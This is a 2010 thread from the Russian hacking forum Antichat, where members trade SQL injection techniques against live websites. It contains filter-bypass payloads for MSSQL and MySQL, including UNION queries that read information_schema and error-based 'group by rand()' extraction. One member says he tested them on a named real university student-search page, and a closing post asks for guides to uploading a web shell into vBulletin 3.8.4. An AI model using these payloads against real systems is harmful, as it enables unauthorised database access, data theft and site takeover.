Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
14.06.2010, 20:54
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Почему запрос к MsSql &Pd=1+or+1=@@version проходит
а &Pd=1+or+1=(select db_name())
уже нет???
ничего не выдает и редирект сразу!
|
|
|
14.06.2010, 21:08
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224
Репутация:
388
|
|
2GOGA075, Возможно скобки фильтруются
2EoGeneo, хм, скули не вижу
Последний раз редактировалось Bb0y; 14.06.2010 в 21:15..
|
|
|
|
14.06.2010, 21:12
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Bb0y как это можно обойти??
И когда делаю запрос &Pd=1+or+1=()
редиректа нету, я не думаю что все таки фильтруются!!
|
|
|
|
14.06.2010, 21:16
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224
Репутация:
388
|
|
2GOGA075, скинь линк в лс, посмотрю
|
|
|
|
14.06.2010, 21:43
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от GOGA075
Почему запрос к MsSql &Pd=1+or+1=@@version проходит
а &Pd=1+or+1=(select db_name())
уже нет???
ничего не выдает и редирект сразу!
Да select фильтруется.
Если не скобки, то что ещё там может фильтроваться? seLEcT попробуй вбить. // Постом отправить.
|
|
|
|
14.06.2010, 21:53
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Ctacok Смена больших и маленьких букв не помогла, все равно переносит на главную!
|
|
|
|
14.06.2010, 22:03
|
|
Новичок
Регистрация: 03.01.2009
Сообщений: 27
Провел на форуме:
367442
Репутация:
41
|
|
Эксперементирую с group by rand()...
На 5 версии
Код:
select count(0) from table group by concat(version(),x)
x = floor(rand(0)*2) или rand(0)|0 или rand(0)&1 или rand()^0
выдает Duplicate entry
x = rand(0)
выполняется без ошибок.
Решил проверить на 4 версии. (Проверял на сайте http://decanat5.ssau.ru/search_student в sql-inj)
И вот тут результаты просто поставили в ступор
Код:
' union select 1,count(*),3 from student group by concat(version(),rand(0))/*
Выдает Duplicate entry, а
Код:
' union select 1,count(*),3 from student group by concat((select 1),rand(0))/*
нет. В то время как
Код:
' union select 1,count(*),3 from student group by concat(version(),(select 1),rand(0))/*
выдает Duplicate entry, а
Код:
' union select 1,count(*),3 from student group by concat(version(),(select studentid from student limit 1),rand(0))/*
нет.
Так вот вопрос)
1) Почему на 4 версии иногда прокатывает с rand(0), а на 5, сколько не пытался, так и не получилось
2) Почему с floor(rand(0)*2) прокатывает всегда, а с теми же rand(0)|0 работает только на 5 версии
3) Почему вот такой запрос не выдает ошибку, не смотря на то что там floor(rand(0)*2)
Код:
' and (1) = (select count(*) from student group by floor(rand(0)*2))/*
|
|
|
|
14.06.2010, 22:03
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
GOGA075, пробуй что то типа этого:
?id=(1)and(1)=(0)union(select(null),table_name,(nu ll)from(information_schema.tables)limit 28,1--)
|
|
|
|
14.06.2010, 22:08
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
jecka3000 тоже никакой реакции...
|
|
|
|
14.06.2010, 23:11
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме:
315861
Репутация:
5
|
|
Парни, дайте покурить маны по поводу заливки шшела в булку 3.8.4
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
